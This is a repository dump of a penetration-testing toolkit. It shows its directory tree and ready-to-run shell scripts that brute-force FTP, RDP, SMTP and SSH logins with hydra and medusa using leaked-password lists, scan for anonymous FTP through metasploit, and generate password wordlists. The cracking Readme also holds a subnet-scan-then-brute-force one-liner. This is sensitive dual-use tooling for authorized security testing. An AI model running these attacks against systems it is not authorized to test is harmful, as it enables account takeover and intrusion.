├── .gitignore
├── LICENSE
├── README.md
├── ad
└── Readme.md
├── auditing
└── parse-docker-bench-security-json-file.py
├── automation
└── nmap_auto.sh
├── cracking
├── Readme.md
├── anonymous-ftp.sh
├── brute-force-ftp-hydra.sh
├── brute-force-ftp-medusa.sh
├── brute-force-ftp.sh
├── brute-force-rdp-hydra.sh
├── brute-force-smtp-hydra.sh
├── brute-force-smtp-medusa.sh
├── brute-force-ssh-hydra.sh
├── brute-force-ssh-medusa.sh
├── create-password-list-from-rockyou-with-policy.sh
├── crunch-charset.sh
├── crunch-pattern.sh
├── generate-wordlist-from-site.sh
├── generate-wordlist.sh
├── open-relay-smtp.sh
├── oracle-login.sh
├── smtp-users-enumeration.sh
└── ssh-bf.sh
├── enumeration
└── citrix.list
├── firewall
├── extract-country-from-list-subnets.py
└── subnetslist.example
├── generate-scripts-lists
├── dirb-generate-scan.sh
├── eyewitness-generate-url-list.sh
├── generate-tcp-full-scan-from-live-hosts-fast-noping-nodns.sh
├── generate-tcp-srv-scan-from-open-ports-fast-noping-nodns.sh
├── generate-tcp-srv-scan-from-open-ports-noping-nodns.sh
├── generate-tcp-srv-scan-from-open-ports-noping.sh
├── generate-tcp-top1000-scan-from-live-hosts-fast-noping-nodns.sh
├── generate-udp-full-scan-from-live-hosts-fast-noping-nodns.sh
├── generate-udp-srv-scan-from-open-ports-fast-noping-nodns.sh
├── generate-udp-srv-scan-from-open-ports-noping-nodns.sh
├── generate-udp-srv-scan-from-open-ports-noping.sh
└── generate-udp-top1000-scan-from-live-hosts-fast-noping-nodns.sh
├── grep
├── grep-host-services-for-excel.sh
├── grep-host-services.sh
├── grep-list-hosts-and-open-ports-to-csv.sh
├── grep-list-hosts-and-open-ports-to-matrix.sh
├── grep-list-hosts-and-open-ports-to-txt.sh
├── grep-list-hosts-and-open-ports.sh
├── grep-list-hosts-having-open-ports.sh
├── grep-list-hosts-open-ports-and-services-to-matrix.sh
├── grep-list-hosts-open-ports-and-services-to-txt.sh
├── grep-unique-hosts-with-open-ports-comma.sh
├── grep-unique-live-hosts-comma.sh
├── grep-unique-live-hosts-having-more-than-one-port-open.sh
├── grep-unique-live-hosts.sh
├── grep-unique-open-ports-comma.sh
├── grep-unique-open-ports.sh
├── grep-web-servers-by-knownports.sh
├── grep-web-servers-to-links-txt.sh
├── grep-web-servers-to-links.sh
└── grep-web-servers.sh
├── ldap
├── scan-enum4linux.sh
└── scan-ldapsearch.sh
├── live-hosts
├── discover-live-hosts-ack-from-list.sh
├── discover-live-hosts-ack.sh
├── discover-live-hosts-all-debug.sh
├── discover-live-hosts-all.sh
├── discover-live-hosts-icmp-echo-from-list.sh
├── discover-live-hosts-icmp-echo.sh
├── discover-live-hosts-netmask-request-discovery.sh
├── discover-live-hosts-oses.sh
├── discover-live-hosts-protocol-ping-from-list.sh
├── discover-live-hosts-protocol-ping.sh
├── discover-live-hosts-sctp-from-list.sh
├── discover-live-hosts-sctp.sh
├── discover-live-hosts-syn-from-list.sh
├── discover-live-hosts-syn.sh
├── discover-live-hosts-tcp-internet.sh
├── discover-live-hosts-timestamp-from-list.sh
├── discover-live-hosts-timestamp.sh
├── discover-live-hosts-top100.sh
├── discover-live-hosts-udp-from-list.sh
├── discover-live-hosts-udp-internet.sh
├── discover-live-hosts-udp.sh
├── discover-local-live-hosts-arpscan.sh
├── discover-local-live-hosts-netbios.sh
├── discover-local-live-hosts-netdiscover.sh
├── discover-local-live-hosts-passively-p0f.sh
├── ping-from-linux.sh
└── ping.sh
├── m365
└── Readme.md
├── metasploit
├── binding.md
├── multi-handler.md
└── payloads.md
├── misc
├── helpful-commands.md
├── openvas.md
├── port-forwarding.md
├── print-top-tcp-ports.sh
├── print-top-udp-ports.sh
├── responds-to-ping.sh
├── socat.md
├── ssh.md
└── stunnel.md
├── mobile
└── Readme.md
├── nessus
├── extract-info-nessus.md
└── group-nessus-vulnerabilities.sh
├── oracle
├── odat-passwordguesser.sh
├── odat-ping.sh
├── odat-sidguesser.sh
├── odat-status.sh
├── odat-tnspoison.sh
├── odat-version.sh
├── oracle-tnscmd-ping.sh
├── oracle-tnscmd-version.sh
└── scanner.sh
├── phishing
└── dnstwist.sh
├── port-scanning
├── tcp
│ ├── full
│ │ ├── tcp-ports-scan-full-delay-nc.sh
│ │ ├── tcp-ports-scan-full-delay-sequential-fulltcpcon.sh
│ │ ├── tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh
│ │ ├── tcp-ports-scan-full-delay-sequential-noping.sh
│ │ ├── tcp-ports-scan-full-delay-sequential.sh
│ │ ├── tcp-ports-scan-full-fast-noping-nodns.sh
│ │ ├── tcp-ports-scan-full-maxrate-noping.sh
│ │ ├── tcp-ports-scan-full-maxrate.sh
│ │ ├── tcp-ports-scan-full-nodns.sh
│ │ ├── tcp-ports-scan-full-noping-nodns.sh
│ │ ├── tcp-ports-scan-full-noping.sh
│ │ ├── tcp-ports-scan-full-super-fast-noping-nodns.sh
│ │ ├── tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh
│ │ └── tcp-ports-scan-full.sh
│ ├── services
│ │ ├── tcp-ports-services-scan-top400-noping.sh
│ │ ├── tcp-services-fast-scan-noping.sh
│ │ ├── tcp-services-scan-noping.sh
│ │ ├── tcp-services-scan-top1000-noping.sh
│ │ └── tcp-services-super-fast-scan-noping.sh
│ ├── tcp-ports-scan-common-slow-noping-nodns-ratelimited-stealth.sh
│ ├── tcp-ports-scan-delay-nc.sh
│ ├── tcp-ports-scan-known-exposed-web.sh
│ ├── tcp-ports-scan-nc.sh
│ ├── tcp-ports-scan-top-stealth-paranoid.sh
│ ├── tcp-ports-scan-top-stealth.sh
│ ├── tcp-ports-scan-top1000-fast-noping-nodns.sh
│ ├── tcp-ports-scan-top1000-maxrate-noping.sh
│ ├── tcp-ports-scan-top1000-maxrate.sh
│ ├── tcp-ports-scan-top1000-noping-nodns.sh
│ ├── tcp-ports-scan-top1000-noping.sh
│ ├── tcp-ports-scan-top1000-slow-noping-nodns-ratelimited-stealth.sh
│ ├── tcp-ports-scan-top1000-slow-noping-nodns.sh
│ ├── tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh
│ ├── tcp-ports-scan-top1000.sh
│ ├── tcp-ports-scan-top2000-noping-nodns.sh
│ └── tcp-scan-web-server.sh
└── udp
│ ├── full
│ ├── udp-ports-scan-full-fast-noping-nodns.sh
│ ├── udp-ports-scan-full-nodns.sh
│ ├── udp-ports-scan-full-noping-nodns.sh
│ ├── udp-ports-scan-full-noping.sh
│ ├── udp-ports-scan-full-super-fast-noping-nodns.sh
│ └── udp-ports-scan-full.sh
│ ├── services
│ ├── udp-services-fast-scan-noping.sh
│ ├── udp-services-scan-noping.sh
│ ├── udp-services-scan-top1000-noping.sh
│ ├── udp-services-scan-top400-noping.sh
│ └── udp-services-super-fast-scan-noping.sh
│ ├── udp-ports-scan-common-noping-nodns-slow-ratelimited-stealthy.sh
│ ├── udp-ports-scan-known-exposed-web.sh
│ ├── udp-ports-scan-top100-unicornscan.sh
│ ├── udp-ports-scan-top1000-fast-noping-nodns.sh
│ ├── udp-ports-scan-top1000-nodns.sh
│ ├── udp-ports-scan-top1000-noping-nodns-slow-ratelimited-sleathy.sh
│ ├── udp-ports-scan-top1000-noping-nodns.sh
│ ├── udp-ports-scan-top1000-noping.sh
│ ├── udp-ports-scan-top1000-super-fast-noping-nodns.sh
│ └── udp-ports-scan-top1000.sh
├── reconnaissance
├── ftp-banner.sh
├── hostname.sh
├── ip.sh
├── ips.sh
├── mx.sh
├── nameservers.sh
├── shodan
│ └── shodanhat
│ │ ├── LICENSE
│ │ ├── README.md
│ │ ├── __init__.py
│ │ ├── constantes.py
│ │ └── shodanhat.py
├── smtp-banner.sh
├── web-reconnaissance.py
├── webrecon.sh
├── whois.sh
└── zone-transfer.sh
├── sip
├── scanner-svwar.sh
└── sip-dos.sh
├── skid
├── README.md
└── scan-external-ip-range.sh
├── smb
├── null-session.sh
├── scan-enum4linux.sh
├── scan-execute-command.sh
├── scan-list-contents.sh
├── scan-nbtscan.sh
├── scan-share-permissions.sh
└── scan-smbclient.sh
├── smtp
└── user-enum.sh
├── snmp
├── community.lst
├── discover.sh
├── scan.sh
└── walk.sh
├── sqli
├── mssql.md
└── sqlmap.md
├── ssl
├── ssl-scan.sh
└── tlssled.sh
├── web
├── banner-grabbing-curl-http-proxy.sh
├── banner-grabbing-curl-http.sh
├── banner-grabbing-nc-http.sh
├── banner-grabbing-nc.sh
├── banner-grabbing-nmap-built-in.sh
├── banner-grabbing-nmap-script.sh
├── banner-grabbing-wget-http.sh
├── check-urls.py
├── compare-post-data.py
├── content-type-checker.py
├── curl-delete.sh
├── curl-get.sh
├── curl-options-proxy.sh
├── curl-options.sh
├── curl-post.sh
├── curl-put.sh
├── curl-robots.sh
├── curl-trace.sh
├── dir-scanner-dirsearch-big.sh
├── dir-scanner-dirsearch-medium.sh
├── dir-scanner-ffuf-timeout.sh
├── dir-scanner-ffuf.sh
├── dir-scanner-fine-tuned.sh
├── dir-scanner-gobuster.sh
├── dir-scanner-proxy.sh
├── dir-scanner.sh
├── extract-urls.py
├── eyewitness.sh
├── headers-checker.py
├── html-to-png-screenshot.sh
├── lists
│ ├── big.list
│ └── common-content-types.list
├── nikto-scan-proxy.sh
├── nikto-scan-useragent-proxy.sh
├── nikto-scan-useragent.sh
├── nikto-scan.sh
├── nikto.md
├── robots-ssl.sh
├── robots.sh
├── screenshot.sh
├── web-app-framework.sh
├── web-headers-malformed-2.sh
├── web-headers-malformed.sh
├── web-headers-null.sh
├── web-recon.sh
└── wordpress-scan.sh
├── wifi
├── wifi.md
└── wpa2.md
└── windows
├── Readme.md
└── wmi.md
/README.md:
--------------------------------------------------------------------------------
1 | ## PenTestKit
2 |
3 | *Useful tools & scripts during Penetration Testing Engagements*
4 |
5 | ***
6 |
7 | ### Download - Installation
8 |
9 | ```bash
10 | git clone https://github.com/maldevel/PenTestKit.git
11 | cd PenTestKit/
12 | ```
13 |
--------------------------------------------------------------------------------
/cracking/Readme.md:
--------------------------------------------------------------------------------
1 | ## README
2 |
3 | ### Detecting SSH and Brute-forcing it
4 |
5 | ```sh
6 | nmap -p 22 --open -oG live_hosts.txt x.y.z.0/24
7 | grep "Up" live_hosts.txt | awk '{print $2}' > ips.txt
8 | hydra -l Administrator -P passwords.lst -M ips.txt ssh -t 4
9 | ```
10 |
11 | ---
12 |
--------------------------------------------------------------------------------
/cracking/anonymous-ftp.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
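# Usage: anonymous-ftp.sh <target>
# Feeds a short resource script to msfconsole on stdin (-r -) that runs the
# auxiliary/scanner/ftp/anonymous module against <target>.
# -n starts without a database, -q suppresses the banner.
if [ "$#" -eq 1 ]; then
    # $1 is expanded inside the here-document below, so a line break in it
    # would be read by msfconsole as an additional console command.
    case $1 in
        *$'\n'* | *$'\r'*)
            echo "Target must not contain line breaks." >&2
            exit 1
            ;;
    esac
    msfconsole -n -q -r - << EOF
use auxiliary/scanner/ftp/anonymous
set RHOSTS $1
run
exit
EOF
else
    # Usage errors go to stderr with a non-zero status so wrappers can tell
    # that nothing was run.
    echo "Please provide the target ftp server." >&2
    exit 1
fi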
34 |
--------------------------------------------------------------------------------
/cracking/brute-force-ftp-hydra.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
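# Usage: brute-force-ftp-hydra.sh <host> <port>
# Runs hydra against the FTP service on <host>:<port> with the SecLists short
# username list and the darkweb2017 top-100 password list, logging to
# ftp_<host>_<port>_hydra.txt in the current directory.
if [ "$#" -eq 2 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -e nsr adds empty, login-as-password and reversed-login guesses;
    # -f stops at the first valid pair. Arguments are quoted so a value with
    # spaces or glob characters cannot split into extra hydra options.
    hydra -v \
        -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
        -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
        -s "$2" -e nsr -f \
        -o "ftp_$1_$2_hydra.txt" \
        "ftp://$1"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target FTP server and its port." >&2
    exit 1
fi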
29 |
--------------------------------------------------------------------------------
/cracking/brute-force-ftp-medusa.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
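# Usage: brute-force-ftp-medusa.sh <host> <port>
# Runs medusa's ftp module against <host>:<port> with the SecLists short
# username list and the darkweb2017 top-100 password list, logging to
# ftp_<host>_<port>_medusa.txt in the current directory.
if [ "$#" -eq 2 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -e ns adds empty and same-as-username guesses; -f stops after the first
    # valid pair. Arguments are quoted to prevent word splitting and globbing.
    medusa -v 4 \
        -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" \
        -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" \
        -f -e ns -n "$2" \
        -O "ftp_$1_$2_medusa.txt" \
        -M ftp -h "$1"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target FTP server and its port." >&2
    exit 1
fi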
29 |
--------------------------------------------------------------------------------
/cracking/brute-force-rdp-hydra.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
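# Usage: brute-force-rdp-hydra.sh <host> <port>
# Runs hydra against the RDP service on <host>:<port> with the SecLists short
# username list and the darkweb2017 top-100 password list, logging to
# rdp_<host>_<port>_hydra.txt in the current directory.
if [ "$#" -eq 2 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -t 2 limits hydra to two parallel tasks; -e nsr adds empty,
    # login-as-password and reversed-login guesses; -f stops at the first
    # valid pair. Arguments are quoted to prevent word splitting and globbing.
    hydra -v \
        -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
        -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
        -s "$2" -e nsr -f -t 2 \
        -o "rdp_$1_$2_hydra.txt" \
        "rdp://$1"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target RDP server and its port." >&2
    exit 1
fi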
29 |
--------------------------------------------------------------------------------
/cracking/brute-force-smtp-hydra.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
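# Usage: brute-force-smtp-hydra.sh <email-account> <smtp-server> <port>
# Runs hydra against the SMTP service on <smtp-server>:<port> for the single
# login <email-account>, using the darkweb2017 top-100 password list and
# logging to smtp_<smtp-server>_<port>_hydra.txt in the current directory.
#
# The command reads $1, $2 and $3, so three arguments are required. The
# previous check for two left $3 empty, which made the word after -s
# disappear and produced a log name without a port.
if [ "$#" -eq 3 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -e nsr adds empty, login-as-password and reversed-login guesses;
    # -f stops at the first valid pair. Arguments are quoted to prevent
    # word splitting and globbing.
    hydra -v \
        -l "$1" \
        -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
        -s "$3" -e nsr \
        -o "smtp_$2_$3_hydra.txt" \
        -f "smtp://$2"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target email account, the SMTP server and its port." >&2
    exit 1
fi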
29 |
--------------------------------------------------------------------------------
/cracking/brute-force-smtp-medusa.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
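# Usage: brute-force-smtp-medusa.sh <host> <port>
# Runs medusa's smtp module against <host>:<port> with the SecLists short
# username list and the darkweb2017 top-100 password list, logging to
# smtp_<host>_<port>_medusa.txt in the current directory.
#
# NOTE(review): this block previously also ran the hydra command from
# brute-force-smtp-hydra.sh. That command expects <account> <server> <port>,
# so with this script's two arguments it treated the port as the server name
# and sent traffic to a host nobody asked for. It looks like a copy-paste
# leftover and has been removed; the usage text now matches the two
# arguments the medusa command actually reads.
if [ "$#" -eq 2 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -e ns adds empty and same-as-username guesses; -f stops after the first
    # valid pair. Arguments are quoted to prevent word splitting and globbing.
    medusa -v 4 \
        -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" \
        -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" \
        -f -e ns -n "$2" \
        -O "smtp_$1_$2_medusa.txt" \
        -M smtp -h "$1"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target SMTP server and its port." >&2
    exit 1
fi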
30 |
--------------------------------------------------------------------------------
/cracking/brute-force-ssh-hydra.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
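# Usage: brute-force-ssh-hydra.sh <host> <port>
# Runs hydra against the SSH service on <host>:<port> with the SecLists short
# username list and the darkweb2017 top-100 password list, logging to
# ssh_<host>_<port>_hydra.txt in the current directory.
if [ "$#" -eq 2 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -e nsr adds empty, login-as-password and reversed-login guesses;
    # -f stops at the first valid pair. Arguments are quoted to prevent
    # word splitting and globbing.
    hydra -v \
        -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
        -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
        -s "$2" -e nsr -f \
        -o "ssh_$1_$2_hydra.txt" \
        "ssh://$1"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target SSH server and its port." >&2
    exit 1
fi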
30 |
--------------------------------------------------------------------------------
/cracking/brute-force-ssh-medusa.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
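# Usage: brute-force-ssh-medusa.sh <host> <port>
# Runs medusa's ssh module against <host>:<port> with the SecLists short
# username list and the darkweb2017 top-100 password list, logging to
# ssh_<host>_<port>_medusa.txt in the current directory.
if [ "$#" -eq 2 ]; then
    # The log can hold valid credentials; keep it readable by the operator only.
    umask 077
    # -e ns adds empty and same-as-username guesses; -f stops after the first
    # valid pair. Arguments are quoted to prevent word splitting and globbing.
    medusa -v 4 \
        -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" \
        -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" \
        -f -e ns -n "$2" \
        -O "ssh_$1_$2_medusa.txt" \
        -M ssh -h "$1"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target SSH server and its port." >&2
    exit 1
fi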
29 |
--------------------------------------------------------------------------------
/cracking/crunch-charset.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
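# Usage: crunch-charset.sh <min-length> <max-length> <charset-name>
# Generates every string from <min-length> to <max-length> characters using
# the character set named <charset-name> in /usr/share/crunch/charset.lst,
# and writes it to crunch-wordlist-<min>-<max>-<charset-name>.txt.
if [ "$#" -eq 3 ]; then
    # The output grows exponentially with <max-length>, so check free disk
    # space first. Arguments are quoted to prevent word splitting and
    # globbing in the lengths, the set name and the output file name.
    crunch "$1" "$2" -f /usr/share/crunch/charset.lst "$3" \
        -o "crunch-wordlist-$1-$2-$3.txt"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide minimum password length, maximum password length and charset string." >&2
    exit 1
fi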
29 |
--------------------------------------------------------------------------------
/cracking/crunch-pattern.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
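# Usage: crunch-pattern.sh <min-length> <max-length> <pattern>
# Generates strings that follow the crunch -t <pattern> and writes them to
# crunch-wordlist-<min>-<max>.txt. The pattern is not part of the file name,
# so a second run with the same lengths reuses that name.
if [ "$#" -eq 3 ]; then
    # Quote the pattern: its placeholder characters (such as % and ^) and any
    # literal * or ? must reach crunch unchanged, not be expanded by the shell.
    crunch "$1" "$2" -t "$3" -o "crunch-wordlist-$1-$2.txt"
else
    # The third argument is a pattern, not a charset name; the message used
    # to be a copy of the one in crunch-charset.sh.
    echo "Please provide minimum password length, maximum password length and pattern." >&2
    exit 1
fi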
29 |
--------------------------------------------------------------------------------
/cracking/generate-wordlist-from-site.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
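# Usage: generate-wordlist-from-site.sh <website> <min-word-length>
# Runs cewl on <website>, keeps words of at least <min-word-length>
# characters (-m) and writes them to <website>-wordlist.txt (-w).
if [ "$#" -eq 2 ]; then
    # A URL contains ':' and '/', which made "$1-wordlist.txt" point into a
    # directory that does not exist. Replace anything outside [A-Za-z0-9._-]
    # with '_' for the file name; a bare host name is left unchanged.
    out_name=${1//[^A-Za-z0-9._-]/_}
    cewl "$1" -m "$2" -w "${out_name}-wordlist.txt"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide a website and a password length." >&2
    exit 1
fi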
29 |
--------------------------------------------------------------------------------
/cracking/generate-wordlist.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
